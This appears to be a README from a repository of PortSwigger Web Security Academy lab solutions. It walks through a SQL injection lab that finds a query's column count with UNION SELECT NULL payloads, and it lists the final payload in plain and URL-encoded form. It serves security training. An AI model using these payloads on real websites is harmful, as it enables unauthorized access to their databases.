darshannn10/PortSwiggers-Web-Sec-Academy/SQL-Injection/Lab-03/Readme.md

 2. Modify the `category` parameter, giving it the value `'+UNION+SELECT+NULL--`.
 Observe that an error occurs.\
 3. Modify the `category` parameter to add an additional column containing a null value: ```'+UNION+SELECT+NULL,NULL--```
 4. Continue adding null values until the error disappears and the response includes additional content containing the null values.
+5. Alternatively, you can also use `ORDER BY` clause

 > Scripting the Attack: [Script](https://github.com/darshannn10/PortSwiggers-Web-Sec-Academy/blob/main/SQL-Injection/Lab-03/sqli-lab-03.py)

 ## Payload:
 Normal: `' UNION SELECT NULL,NULL,NULL--`

 URL-Encoded: `%27+UNION+SELECT+NULL,NULL,NULL--`

 ## Video Solution